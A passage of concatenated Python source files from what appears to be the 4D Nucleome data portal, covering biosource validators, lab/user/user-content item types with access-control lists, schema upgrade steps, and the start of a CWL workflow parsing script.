context.get('blah')
getter = context
except AttributeError:
getter = context.collection
slimfor = None
try:
termuid = get_item_or_none(request, cell_line, 'ontology-terms').get('uuid')
term = getter.get(termuid)
slims = term.upgrade_properties().get('slim_terms', [])
for slim in slims:
slim_term = getter.get(slim)
slimfor = slim_term.upgrade_properties().get('is_slim_for')
if slimfor is not None and slimfor == 'cell':
term_ok = True
break
except AttributeError:
pass
if not term_ok:
try:
cellname = cell_line.get('term_name')
except AttributeError:
cellname = str(cell_line)
request.errors.add('body', 'Biosource: invalid cell_line term', 'Term: ' + cellname + ' is not a known valid cell line')
else:
request.validated.update({})
@view_config(context=Biosource.Collection, permission='add', request_method='POST',
validators=[validate_item_content_post, validate_biosource_cell_line, validate_biosource_tissue])
@view_config(context=Biosource.Collection, permission='add_unvalidated', request_method='POST',
validators=[no_validate_item_content_post],
request_param=['validate=false'])
@debug_log
def biosource_add(context, request, render=None):
return collection_add(context, request, render)
@view_config(context=Biosource, permission='edit', request_method='PUT',
validators=[validate_item_content_put, validate_biosource_cell_line, validate_biosource_tissue]) # , validate_biosource_cell_line])
@view_config(context=Biosource, permission='edit', request_method='PATCH',
validators=[validate_item_content_patch, validate_biosource_cell_line, validate_biosource_tissue]) # , validate_biosource_cell_line])
@view_config(context=Biosource, permission='edit_unvalidated', request_method='PUT',
validators=[no_validate_item_content_put],
request_param=['validate=false'])
@view_config(context=Biosource, permission='edit_unvalidated', request_method='PATCH',
validators=[no_validate_item_content_patch],
request_param=['validate=false'])
@view_config(context=Biosource, permission='index', request_method='GET',
validators=[validate_item_content_in_place, validate_biosource_cell_line, validate_biosource_tissue], # , validate_biosource_cell_line],
request_param=['check_only=true'])
@debug_log
def biosource_edit(context, request, render=None):
return item_edit(context, request, render)
```
#### File: encoded/types/lab.py
```python
from pyramid.security import (
Allow,
Deny,
Everyone,
)
from base64 import b64encode
from snovault import (
collection,
load_schema,
calculated_property
)
from .base import (
Item
)
ONLY_ADMIN_VIEW = [
(Allow, 'group.admin', ['view', 'edit']),
(Allow, 'group.read-only-admin', ['view']),
(Allow, 'remoteuser.INDEXER', ['view']),
(Allow, 'remoteuser.EMBED', ['view']),
(Deny, Everyone, ['view', 'edit'])
]
SUBMITTER_CREATE = []
ALLOW_EVERYONE_VIEW = [
(Allow, Everyone, 'view'),
]
ALLOW_EVERYONE_VIEW_AND_SUBMITTER_EDIT = [
(Allow, Everyone, 'view'),
(Allow, 'role.lab_submitter', 'edit'),
] + ONLY_ADMIN_VIEW
def _build_lab_embedded_list():
""" Helper function intended to be used to create the embedded list for lab.
All types should implement a function like this going forward.
"""
return Item.embedded_list + [
# Award linkTo
'awards.project',
'awards.name',
'awards.pi.last_name',
'awards.center_title'
]
@collection(
name='labs',
unique_key='lab:name',
properties={
'title': 'Labs',
'description': 'Listing of 4D Nucleome labs',
})
class Lab(Item):
"""Lab class."""
item_type = 'lab'
schema = load_schema('encoded:schemas/lab.json')
name_key = 'name'
embedded_list = _build_lab_embedded_list()
STATUS_ACL = {
'current': ALLOW_EVERYONE_VIEW_AND_SUBMITTER_EDIT,
'deleted': ONLY_ADMIN_VIEW,
'revoked': ALLOW_EVERYONE_VIEW,
'inactive': ALLOW_EVERYONE_VIEW,
}
@calculated_property(schema={
"title": "Correspondence",
"description": "Point of contact(s) for this Lab.",
"type": "array",
"uniqueItems": True,
"items": {
"title": "Lab Contact - Public Snippet",
"description": "A User associated with the lab who is also a point of contact.",
"type": "object",
"additionalProperties": False,
"properties": {
"display_title": {
"type": "string"
},
"contact_email": {
"type": "string",
"format": "email"
},
"@id": {
"type": "string"
}
}
}
})
def correspondence(self, request, pi=None, contact_persons=None):
"""
Definitive list of users (linkTo User) who are designated as point of contact(s) for this Lab.
Returns:
List of @IDs which refer to either PI or alternate list of contacts defined in `contact_persons`.
"""
contact_people = None
if contact_persons:
contact_people = contact_persons
elif pi:
contact_people = [pi]
def fetch_and_pick_embedded_properties(person_at_id):
'''Clear out some properties from person'''
try:
person = request.embed(person_at_id, '@@object')
except Exception:
return None
encoded_email = b64encode(person['contact_email'].encode('utf-8')).decode('utf-8') if person.get('contact_email') else None
return {
"contact_email": encoded_email, # Security against web scrapers
"@id": person.get('@id'),
"display_title": person.get('display_title')
}
if contact_people is not None:
contact_people_dicts = [ fetch_and_pick_embedded_properties(person) for person in contact_people ]
return [ person for person in contact_people_dicts if person is not None ]
def __init__(self, registry, models):
super().__init__(registry, models)
if hasattr(self, 'STATUS_ACL'):
self.STATUS_ACL.update(self.__class__.STATUS_ACL)
else:
self.STATUS_ACL = self.__class__.STATUS_ACL
def __ac_local_roles__(self):
"""This creates roles that the lab item needs so it can be edited & viewed"""
roles = {}
lab_submitters = 'submits_for.%s' % self.uuid
roles[lab_submitters] = 'role.lab_submitter'
lab_member = 'lab.%s' % self.uuid
roles[lab_member] = 'role.lab_member'
return roles
```
#### File: encoded/types/user_content.py
```python
from uuid import uuid4
from snovault import (
abstract_collection,
calculated_property,
collection,
load_schema
)
from snovault.interfaces import STORAGE
from .base import (
Item,
ALLOW_CURRENT,
DELETED,
ALLOW_LAB_SUBMITTER_EDIT,
ALLOW_VIEWING_GROUP_VIEW,
ONLY_ADMIN_VIEW,
ALLOW_OWNER_EDIT,
ALLOW_ANY_USER_ADD,
lab_award_attribution_embed_list
)
import os
import requests
@abstract_collection(
name='user-contents',
unique_key='user_content:name',
properties={
'title': "User Content Listing",
'description': 'Listing of all types of content which may be created by people.',
})
class UserContent(Item):
item_type = 'user_content'
base_types = ['UserContent'] + Item.base_types
schema = load_schema('encoded:schemas/user_content.json')
embedded_list = lab_award_attribution_embed_list
STATUS_ACL = { # Defaults + allow owner to edit (in case owner has no labs or submit_for)
'released' : ALLOW_OWNER_EDIT + ALLOW_CURRENT,
'deleted' : ALLOW_OWNER_EDIT + DELETED,
'draft' : ALLOW_OWNER_EDIT + ONLY_ADMIN_VIEW,
'released to lab' : ALLOW_OWNER_EDIT + ALLOW_LAB_SUBMITTER_EDIT,
'released to project' : ALLOW_OWNER_EDIT + ALLOW_VIEWING_GROUP_VIEW,
# 'archived' : ALLOW_OWNER_EDIT + ALLOW_CURRENT,
# 'archived to project' : ALLOW_OWNER_EDIT + ALLOW_VIEWING_GROUP_VIEW
}
@calculated_property(schema={
"title": "Content",
"description": "Content (unused)",
"type": "string"
})
def content(self, request):
return None
@calculated_property(schema={
"title": "File Type",
"description": "Type of this Item (unused)",
"type": "string"
})
def filetype(self, request):
return None
def _update(self, properties, sheets=None):
if properties.get('name') is None and self.uuid is not None:
properties['name'] = str(self.uuid)
super(UserContent, self)._update(properties, sheets)
@classmethod
def create(cls, registry, uuid, properties, sheets=None):
submitted_by_uuid = properties.get('submitted_by')
lab_schema = cls.schema and cls.schema.get('properties', {}).get('lab')
award_schema = cls.schema and cls.schema.get('properties', {}).get('award')
if (
not submitted_by_uuid # Shouldn't happen
or (not lab_schema and not award_schema) # If not applicable for Item type (shouldn't happen as props defined on UserContent schema)
or ('lab' in properties or 'award' in properties) # If values exist already - ideal case - occurs for general submission process(es)
):
# Default for all other Items
return super(UserContent, cls).create(registry, uuid, properties, sheets)
submitted_by_item = registry[STORAGE].get_by_uuid(submitted_by_uuid)
if submitted_by_item:
# All linkTo property values, if present, are UUIDs
if 'lab' not in properties and 'lab' in submitted_by_item.properties:
# Use lab of submitter - N.B. this differs from other Items where lab comes from 'submits_for' list.
properties['lab'] = submitted_by_item.properties['lab']
if 'award' not in properties and 'lab' in submitted_by_item.properties:
lab_item = registry[STORAGE].get_by_uuid(submitted_by_item.properties['lab'])
if lab_item and len(lab_item.properties.get('awards', [])) > 0:
# Using first award as default/fallback when award not explicitly selected/sent.
properties['award'] = lab_item.properties['awards'][0]
return super(UserContent, cls).create(registry, uuid, properties, sheets)
@collection(
name='static-sections',
unique_key='user_content:name',
properties={
'title': 'Static Sections',
'description': 'Static Sections for the Portal',
})
class StaticSection(UserContent):
"""The Software class that contains the software... used."""
item_type = 'static_section'
schema = load_schema('encoded:schemas/static_section.json')
@calculated_property(schema={
"title": "Content",
"description": "Content for the page",
"type": "string"
})
def content(self, request, body=None, file=None):
if isinstance(body, str) or isinstance(body, dict) or isinstance(body, list):
# Don't need to load in anything. We don't currently support dict/json body (via schema) but could in future.
return body
if isinstance(file, str):
if file[0:4] == 'http' and '://' in file[4:8]: # Remote File
return get_remote_file_contents(file)
else: # Local File
file_path = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../.." + file) # Go to top of repo, append file
return get_local_file_contents(file_path)
return None
@calculated_property(schema={
"title": "File Type",
"description": "Type of file used for content",
"type": "string"
})
def filetype(self, request, body=None, file=None, options=None):
if options and options.get('filetype') is not None:
return options['filetype']
if isinstance(body, str):
return 'txt'
if isinstance(body, dict) or isinstance(body, list):
return 'json'
if isinstance(file, str):
filename_parts = file.split('.')
if len(filename_parts) > 1:
return filename_parts[len(filename_parts) - 1]
else:
return 'txt' # Default if no file extension.
return None
@collection(
name='higlass-view-configs',
unique_key='user_content:name',
properties={
'title': 'HiGlass Displays',
'description': 'Displays and view configurations for HiGlass',
})
class HiglassViewConfig(UserContent):
"""
Item type which contains a `view_config` property and other metadata.
"""
item_type = 'higlass_view_config'
schema = load_schema('encoded:schemas/higlass_view_config.json')
#@calculated_property(schema={
# "title": "ViewConfig Files",
# "description": "List of files which are defined in ViewConfig",
# "type": "array",
# "linkTo" : "File"
#})
#def viewconfig_files(self, request):
# '''
# TODO: Calculate which files are defined in viewconfig, if any.
# '''
# return None
#@calculated_property(schema={
# "title": "ViewConfig Tileset UIDs",
# "description": "List of UIDs which are defined in ViewConfig",
# "type": "array",
# "items" : {
# "type" : "string"
# }
#})
#def viewconfig_tileset_uids(self, request):
# '''
# TODO: Calculate which tilesetUids are defined in viewconfig, if any.
# '''
# return None
@calculated_property(schema={
"title": "File Type",
"description": "Type of this Item (unused)",
"type": "string"
})
def filetype(self, request):
return "HiglassViewConfig"
class Collection(Item.Collection):
'''
This extension of the default Item collection allows any User to create a new version of these.
Emulates base.py Item collection setting of self.__acl__
TODO:
Eventually we can move this up to UserContent or replicate it on JupyterNotebook if want any
User to be able to create new one.
'''
def __init__(self, *args, **kw):
super(HiglassViewConfig.Collection, self).__init__(*args, **kw)
self.__acl__ = ALLOW_ANY_USER_ADD
@collection(
name='microscope-configurations',
properties={
'title': 'Microscope Configurations',
'description': 'Collection of Metadata for microscope configurations of various Tiers',
})
class MicroscopeConfiguration(UserContent):
"""The MicroscopeConfiguration class that holds configuration of a microscope."""
item_type = 'microscope_configuration'
schema = load_schema('encoded:schemas/microscope_configuration.json')
STATUS_ACL = {
'released' : ALLOW_CURRENT,
'deleted' : DELETED,
'draft' : ALLOW_OWNER_EDIT + ALLOW_LAB_SUBMITTER_EDIT,
'released to project' : ALLOW_VIEWING_GROUP_VIEW
}
def _update(self, properties, sheets=None):
if properties.get('microscope'):
microscope = properties.get('microscope')
# set microscope ID if empty
if not microscope.get('ID'):
microscope['ID'] = str(uuid4())
# always sync item's description to microscope's description
microscopeDesc = microscope.get('Description', '')
properties['description'] = microscopeDesc
super(MicroscopeConfiguration, self)._update(properties, sheets)
@calculated_property(schema={
"title": "Display Title",
"description": "A calculated title for every object in 4DN",
"type": "string"
})
def display_title(self, microscope, title=None):
return title or microscope.get("Name")
class Collection(Item.Collection):
'''
This extension of the default Item collection allows any User to create a new version of these.
Emulates base.py Item collection setting of self.__acl__
'''
def __init__(self, *args, **kw):
super(MicroscopeConfiguration.Collection, self).__init__(*args, **kw)
self.__acl__ = ALLOW_ANY_USER_ADD
@collection(
name='image-settings',
properties={
'title': 'Image Settings',
'description': 'Listing of ImageSetting Items.',
})
class ImageSetting(UserContent):
"""Image Settings class."""
item_type = 'image_setting'
schema = load_schema('encoded:schemas/image_setting.json')
STATUS_ACL = {
'released' : ALLOW_CURRENT,
'deleted' : DELETED,
'draft' : ALLOW_OWNER_EDIT + ALLOW_LAB_SUBMITTER_EDIT,
'released to project' : ALLOW_VIEWING_GROUP_VIEW
}
class Collection(Item.Collection):
'''
This extension of the default Item collection allows any User to create a new version of these.
Emulates base.py Item collection setting of self.__acl__
'''
def __init__(self, *args, **kw):
super(ImageSetting.Collection, self).__init__(*args, **kw)
self.__acl__ = ALLOW_ANY_USER_ADD
def get_local_file_contents(filename, contentFilesLocation=None):
if contentFilesLocation is None:
full_file_path = filename
else:
full_file_path = contentFilesLocation + '/' + filename
if not os.path.isfile(full_file_path):
return None
file = open(full_file_path, encoding="utf-8")
output = file.read()
file.close()
return output
def get_remote_file_contents(uri):
resp = requests.get(uri)
return resp.text
```
#### File: encoded/types/user.py
```python
import logging
import requests
import structlog
import transaction
from pyramid.view import (
view_config,
)
from pyramid.httpexceptions import HTTPUnprocessableEntity
from pyramid.security import (
Allow,
Deny,
Everyone,
)
from .base import Item
from snovault import (
CONNECTION,
calculated_property,
collection,
load_schema,
)
from snovault.storage import User as AuthUser
from snovault.schema_utils import validate_request
from snovault.crud_views import collection_add
# from snovault.calculated import calculate_properties
from snovault.resource_views import item_view_page
from snovault.util import debug_log
from dcicutils.env_utils import is_fourfront_env, is_stg_or_prd_env
from dcicutils.s3_utils import s3Utils
logging.getLogger('boto3').setLevel(logging.WARNING)
log = structlog.getLogger(__name__)
ONLY_ADMIN_VIEW_DETAILS = [
(Allow, 'group.admin', ['view', 'view_details', 'edit']),
(Allow, 'group.read-only-admin', ['view', 'view_details']),
(Allow, 'remoteuser.INDEXER', ['view']),
(Allow, 'remoteuser.EMBED', ['view']),
(Deny, Everyone, ['view', 'view_details', 'edit']),
]
SUBMITTER_CREATE = []
ONLY_OWNER_EDIT = [
(Allow, 'role.owner', 'view'),
(Allow, 'role.owner', 'edit'),
(Allow, 'role.owner', 'view_details')
] + ONLY_ADMIN_VIEW_DETAILS
USER_ALLOW_CURRENT = [
(Allow, Everyone, 'view'),
] + ONLY_ADMIN_VIEW_DETAILS
USER_DELETED = [
(Deny, Everyone, 'visible_for_edit')
] + ONLY_ADMIN_VIEW_DETAILS
def _build_user_embedded_list():
""" Helper function intended to be used to create the embedded list for user.
All types should implement a function like this going forward.
"""
return [
# Lab linkTo
'lab.name',
# Award linkTo
'lab.awards.name',
'lab.awards.project',
# Lab linkTo
'submits_for.name',
]
@collection(
name='users',
unique_key='user:email',
properties={
'title': '4D Nucleome Users',
'description': 'Listing of current 4D Nucleome DCIC users',
},
acl=[])
class User(Item):
"""The user class."""
item_type = 'user'
schema = load_schema('encoded:schemas/user.json')
embedded_list = _build_user_embedded_list()
STATUS_ACL = {
'current': ONLY_OWNER_EDIT,
'deleted': USER_DELETED,
'replaced': USER_DELETED,
'revoked': ONLY_ADMIN_VIEW_DETAILS,
}
@calculated_property(schema={
"title": "Title",
"type": "string",
})
def title(self, first_name, last_name):
"""return first and last name."""
title = u'{} {}'.format(first_name, last_name)
return title
@calculated_property(schema={
"title": "Display Title",
"description": "A calculated title for every object in 4DN",
"type": "string"
})
def display_title(self, first_name, last_name):
return self.title(first_name, last_name)
@calculated_property(schema={
"title": "Contact Email",
"description": "E-Mail address by which this person should be contacted.",
"type": "string",
"format": "email"
})
def contact_email(self, email, preferred_email=None):
"""Returns `email` if `preferred_email` is not defined."""
if preferred_email:
return preferred_email
else:
return email
def __ac_local_roles__(self):
"""return the owner user."""
owner = 'userid.%s' % self.uuid
return {owner: 'role.owner'}
def _update(self, properties, sheets=None):
# subscriptions are search queries used on /submissions page
# always overwrite subscriptions on an update
new_subscriptions = []
if properties.get('submits_for'):
new_subscriptions.append({
'title': 'My submissions',
'url': '?submitted_by.uuid=%s&sort=-date_created' % str(self.uuid)
})
if properties.get('lab'):
new_subscriptions.append({
'title': 'Submissions for my lab',
'url': '?lab.uuid=%s&sort=-date_created' % properties['lab']
})
properties['subscriptions'] = new_subscriptions
# if we are on a production environment, make sure there is an account for the
# user that reflects any email changes
ff_env = self.registry.settings.get('env.name')
# compare previous and updated emails, respectively
try:
prev_email = self.properties.get('email')
except KeyError: # if new user, previous properties do not exist
prev_email = None
new_email = properties.get('email')
update_email = new_email if prev_email != new_email else None
# Is this only for fourfront or does cgap want to do this, too? -kmp 3-Apr-2020
if ff_env is not None and update_email is not None and is_fourfront_env(ff_env) and is_stg_or_prd_env(ff_env):
try:
s3Obj = s3Utils(env='data')
jh_key = s3Obj.get_jupyterhub_key()
jh_endpoint = ''.join([jh_key['server'], '/hub/api/users/', update_email])
jh_headers = {'Authorization': 'token %s' % jh_key['secret']}
res = requests.post(jh_endpoint, headers=jh_headers)
except Exception as jh_exc:
log.error('Error posting user %s to JupyterHub' % update_email,
error=str(jh_exc))
else:
log.info('Updating user %s on JupyterHub. Result: %s' % (update_email, res.text))
super(User, self)._update(properties, sheets)
@view_config(context=User, permission='view', request_method='GET', name='page')
@debug_log
def user_page_view(context, request):
"""smth."""
properties = item_view_page(context, request)
if not request.has_permission('view_details'):
filtered = {}
for key in ['@id', '@type', 'uuid', 'lab', 'title', 'display_title']:
try:
filtered[key] = properties[key]
except KeyError:
pass
return filtered
return properties
@view_config(context=User.Collection, permission='add', request_method='POST',
physical_path="/users")
@debug_log
def user_add(context, request):
'''
if we have a password in our request, create and auth entry
for the user as well
'''
# do we have valid data
pwd = request.<PASSWORD>.get('password', None)
pwd_less_data = request.json.copy()
if pwd is not None:
del pwd_less_data['password']
validate_request(context.type_info.schema, request, pwd_less_data)
if request.errors:
return HTTPUnprocessableEntity(json={'errors': request.errors},
content_type='application/json')
result = collection_add(context, request)
if result:
email = request.json.get('email')
pwd = request.json.get('password', None)
name = request.json.get('first_name')
if pwd is not None:
auth_user = AuthUser(email, pwd, name)
db = request.registry['dbsession']
db.add(auth_user)
transaction.commit()
return result
@calculated_property(context=User, category='user_action')
def impersonate(context, request):
"""smth."""
# This is assuming the user_action calculated properties
# will only be fetched from the current_user view,
# which ensures that the user represented by 'context' is also an effective principal
if request.has_permission('impersonate'):
return {
'id': 'impersonate',
'title': 'Impersonate User…',
'href': request.resource_path(context) + '?currentAction=impersonate-user',
}
@calculated_property(context=User, category='user_action')
def profile(context, request):
"""smth."""
return {
'id': 'profile',
'title': 'Profile',
'href': request.resource_path(context),
}
@calculated_property(context=User, category='user_action')
def submissions(request):
"""smth."""
return {
'id': 'submissions',
'title': 'Submissions',
'href': '/submissions',
}
```
#### File: encoded/upgrade/biosample.py
```python
from snovault import upgrade_step
@upgrade_step('biosample', '1', '2')
def biosample_1_2(value, system):
if 'cell_culture_details' in value:
value['cell_culture_details'] = [value['cell_culture_details']]
```
#### File: encoded/upgrade/experiment.py
```python
from snovault import upgrade_step
from . import _get_biofeat_for_target as getbf4t
@upgrade_step('experiment_repliseq', '1', '2')
def experiment_repliseq_1_2(value, system):
if value['experiment_type'] == 'repliseq':
value['experiment_type'] = 'Repli-seq'
@upgrade_step('experiment_repliseq', '2', '3')
def experiment_repliseq_2_3(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
# if antibody_lot_id exists it should be fine in new field
@upgrade_step('experiment_chiapet', '1', '2')
def experiment_chiapet_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_chiapet', '2', '3')
def experiment_chiapet_2_3(value, system):
if value.get('experiment_type') == 'CHIA-pet':
value['experiment_type'] = 'ChIA-PET'
@upgrade_step('experiment_damid', '1', '2')
def experiment_damid_1_2(value, system):
if value.get('index_pcr_cycles'):
value['pcr_cycles'] = value['index_pcr_cycles']
del value['index_pcr_cycles']
if value.get('fusion'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['fusion']
else:
value['notes'] = value['fusion']
del value['fusion']
@upgrade_step('experiment_mic', '1', '2')
def experiment_mic_1_2(value, system):
fish_dict = {'DNA-FiSH': 'DNA FISH', 'RNA-FiSH': 'RNA FISH', 'FiSH': 'FISH'}
if value.get('experiment_type') and value['experiment_type'] in fish_dict.keys():
value['experiment_type'] = fish_dict[value['experiment_type']]
@upgrade_step('experiment_seq', '1', '2')
def experiment_seq_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_seq', '2', '3')
def experiment_seq_2_3(value, system):
if value.get('experiment_type') == 'CHIP-seq':
value['experiment_type'] = 'ChIP-seq'
@upgrade_step('experiment_atacseq', '1', '2')
@upgrade_step('experiment_capture_c', '1', '2')
@upgrade_step('experiment_chiapet', '3', '4')
@upgrade_step('experiment_damid', '2', '3')
@upgrade_step('experiment_hi_c', '1', '2')
@upgrade_step('experiment_mic', '2', '3')
@upgrade_step('experiment_repliseq', '3', '4')
@upgrade_step('experiment_seq', '3', '4')
@upgrade_step('experiment_tsaseq', '1', '2')
def experiment_1_2(value, system):
exptype = value.get('experiment_type')
if exptype == 'Repli-seq':
tot_fracs = value.get('total_fractions_in_exp', 2)
if tot_fracs > 2:
exptype = 'Multi-stage Repli-seq'
else:
exptype = '2-stage Repli-seq'
elif exptype == 'DAM-ID seq':
exptype = 'DamID-seq'
valid_exptypes = system['registry']['collections']['ExperimentType']
exptype_item = valid_exptypes.get(exptype)
if not exptype_item:
exptypename = exptype.lower().replace(' ', '-')
exptype_item = valid_exptypes.get(exptypename)
exptype_uuid = None
try:
exptype_uuid = str(exptype_item.uuid)
except AttributeError:
note = '{} ITEM NOT FOUND'.format(exptype)
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
value['experiment_type'] = exptype_uuid
@upgrade_step('experiment_seq', '4', '5')
@upgrade_step('experiment_chiapet', '4', '5')
@upgrade_step('experiment_damid', '3', '4')
@upgrade_step('experiment_tsaseq', '2', '3')
def experiment_targeted_factor_upgrade(value, system):
factor = value.get('targeted_factor')
if factor:
del value['targeted_factor']
note = 'Old Target: {}'.format(factor)
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
target = targets.get(factor)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
value['targeted_factor'] = [bfuuid]
else:
note = 'UPDATE NEEDED: ' + note
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
@upgrade_step('experiment_capture_c', '2', '3')
def experiment_capture_c_1_2(value, system):
tregions = value.get('targeted_regions')
if tregions:
new_vals = []
del value['targeted_regions']
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
note = ''
for tr in tregions:
t = tr.get('target') # it's required
of = tr.get('oligo_file', '')
tstr = 'Old Target: {} {}'.format(t, of)
target = targets.get(t)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
tinfo = {'target': [bfuuid]}
if of:
tinfo['oligo_file'] = of
new_vals.append(tinfo)
else:
tstr = 'UPDATE NEEDED: ' + tstr
note += tstr
if new_vals:
value['targeted_regions'] = new_vals
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
```
#### File: encoded/upgrade/experiment_set.py
```python
from snovault import upgrade_step
@upgrade_step('experiment_set', '1', '2')
def experiment_set_1_2(value, system):
if 'date_released' in value:
value['public_release'] = value['date_released']
del value['date_released']
@upgrade_step('experiment_set_replicate', '1', '2')
def experiment_set_replicate_1_2(value, system):
if 'date_released' in value:
value['public_release'] = value['date_released']
del value['date_released']
```
#### File: encoded/upgrade/file.py
```python
from snovault import (
upgrade_step,
)
@upgrade_step('file_fastq', '1', '2')
@upgrade_step('file_calibration', '1', '2')
@upgrade_step('file_microscopy', '1', '2')
@upgrade_step('file_processed', '1', '2')
@upgrade_step('file_reference', '1', '2')
def file_1_2(value, system):
file_format = value.get('file_format')
formats = system['registry']['collections']['FileFormat']
format_item = formats.get(file_format)
fuuid = None
try:
fuuid = str(format_item.uuid)
except AttributeError:
pass
if not fuuid:
other_format = formats.get('other')
fuuid = str(other_format.uuid)
note = value.get('notes', '')
note = note + ' FILE FORMAT: ' + file_format
value['notes'] = note
value['file_format'] = fuuid
# need to also check for extra files to upgrade_step
extras = value.get('extra_files')
if extras:
for i, extra in enumerate(extras):
eformat = extra.get('file_format')
eformat_item = formats.get(eformat)
efuuid = None
try:
efuuid = str(eformat_item.uuid)
except AttributeError:
pass
if not efuuid:
other_format = formats.get('other')
efuuid = str(other_format.uuid)
note = value.get('notes', '')
note = note + ' EXTRA FILE FORMAT: ' + str(i) + '-' + eformat
value['notes'] = note
value['extra_files'][i]['file_format'] = efuuid
@upgrade_step('file_processed', '2', '3')
@upgrade_step('file_vistrack', '1', '2')
def file_track_data_upgrade(value, system):
field_map = {
"dataset_type": "override_experiment_type",
"assay_info": "override_assay_info",
"replicate_identifiers": "override_replicate_info",
"biosource_name": "override_biosource_name",
"experiment_bucket": "override_experiment_bucket",
"project_lab": "override_lab_name"
}
for oldprop, newprop in field_map.items():
oldpropval = value.get(oldprop)
if oldpropval:
if oldprop == 'replicate_identifiers':
if len(oldpropval) > 1:
oldpropval = 'merged replicates'
else:
oldpropval = oldpropval[0]
value[newprop] = oldpropval
del value[oldprop]
```
#### File: encoded/upgrade/imaging_path.py
```python
from snovault import upgrade_step
from . import _get_biofeat_for_target as getbf4t
@upgrade_step('imaging_path', '1', '2')
def imaging_path_1_2(value, system):
''' convert targets to biofeatures '''
iptargets = value.get('target')
if iptargets:
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
del value['target']
note = 'Old Target: {}'.format(iptargets)
targets2add = []
for ipt in iptargets:
target = targets.get(ipt)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
targets2add.append(bfuuid)
else:
note += 'UPDATE NEEDED {}; '.format(ipt)
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
value['target'] = targets2add
```
#### File: encoded/upgrade/static_section.py
```python
from snovault import (
upgrade_step,
)
@upgrade_step('static_section', '1', '2')
def static_section_1_2(value, system):
# Rename/move sections
if value['name'] == "help#introduction":
value['name'] = "help.user-guide.data-organization.introduction"
if value['name'] == "help#carousel-place-holder":
value['name'] = "help.user-guide.data-organization.carousel-place-holder"
if value['name'] == "help#introduction2":
value['name'] = "help.user-guide.data-organization.introduction2"
if value['name'] == "help.account-creation#account_creation":
value['name'] = "help.user-guide.account-creation.account_creation"
if value['name'] == "help.getting-started#getting_started":
value['name'] = "help.user-guide.getting-started.getting_started"
if value['name'] == "help.biosample#metadata":
value['name'] = "help.submitter-guide.biosample-metadata.metadata"
if value['name'] == "help.spreadsheet#excel_submission":
value['name'] = "help.submitter-guide.spreadsheet.excel_submission"
if value['name'] == "help.spreadsheet#schema_info":
value['name'] = "help.submitter-guide.spreadsheet.schema_info"
if value['name'] == "help.rest-api#rest_api_submission":
value['name'] = "help.submitter-guide.rest-api.rest_api_submission"
if value['name'] == "help.data-processing-pipelines":
value['name'] = "help.analysis.cwl-docker.data-processing-pipelines"
if value['name'] == "help.spreadsheet#schema_info":
value['name'] = "help.submitter-guide.spreadsheet.schema_info"
if "#" in value['name']:
value['name'] = value['name'].replace('#', '.', 1)
```
#### File: encoded/upgrade/workflow_run.py
```python
from snovault import (
upgrade_step,
)
@upgrade_step('workflow_run_awsem', '1', '2')
@upgrade_step('workflow_run_sbg', '1', '2')
@upgrade_step('workflow_run', '1', '2')
def workflow_run_1_2(value, system):
'''Change input_files.format_if_extra to FileFormat'''
formats = system['registry']['collections']['FileFormat']
input_files = value.get('input_files', [])
for i, infile in enumerate(input_files):
if 'format_if_extra' not in infile:
continue
eformat_item = formats.get(infile['format_if_extra'])
efuuid = None
try:
efuuid = str(eformat_item.uuid)
except AttributeError:
pass
if not efuuid:
msg = 'EXTRA_FILE_FORMAT: %s NOT FOUND' % infile['format_if_extra']
note = value['input_files'][i].get('notes', '')
msg = ' '.join([note, msg])
value['input_files'][i]['notes'] = msg
del value['input_files'][i]['format_if_extra']
else:
value['input_files'][i]['format_if_extra'] = efuuid
@upgrade_step('workflow_run_awsem', '2', '3')
@upgrade_step('workflow_run_sbg', '2', '3')
@upgrade_step('workflow_run', '2', '3')
def workflow_run_2_3(value, system):
if 'output_quality_metrics' in value:
del value['output_quality_metrics']
```
#### File: encoded/workflow_examples/read_cwl_create_workflow_insert.py
```python
import json
import sys
import random
def generate_uuid ():
rand_uuid_start=''
for i in range(8):
r=random.choice('abcdef1234567890')
rand_uuid_start += r
uuid=rand_uuid_start + "-49e5-4c33-afab-9ec90d65faf3"
return uuid
# function that parses 'source' field of CWL, which contain information of step and argument names.
# it returns a dictionary with 'step' and 'arg' as key.
# if the source is global, 'step' will be ''.
def parse_source(source_str):
source={}
source_str = source_str.strip('#')
if '.' in source_str: ## the format is #step.ID, so if '.' doesn't exist, that implies this is a global argument.
## step argument ##
source_arr = source_str.split(".")
source['step'] = source_arr[0]
source['arg'] = source_arr[1]
else:
## global argument ##
source['step'] = ''
source['arg'] = source_str
return(source)
# given the type field of an element of cwl_dict['inputs'] (e.g. cwl_dict['inputs'][1]['type'], return either 'Input file' or 'parameter'.
def Is_Input_file_or_parameter ( cwl_param_type ):
argument_type='parameter' ## default is parameter unless the following conditions meet
if isinstance(cwl_param_type,list):
if 'File' in cwl_param_type: # e.g. type=[ 'File','null' ] (SBG)
argument_type='Input file'
elif isinstance(cwl_param_type[0],dict) and cwl_param_type[0]['type']=='array' and cwl_param_type[0]['items']=='File': # e.g. type=[{'type':'array','items':'File'}] (SBG)
argument_type='Input file'
elif cwl_param_type=='File': # e.g. type='File'
argument_type='Input file'
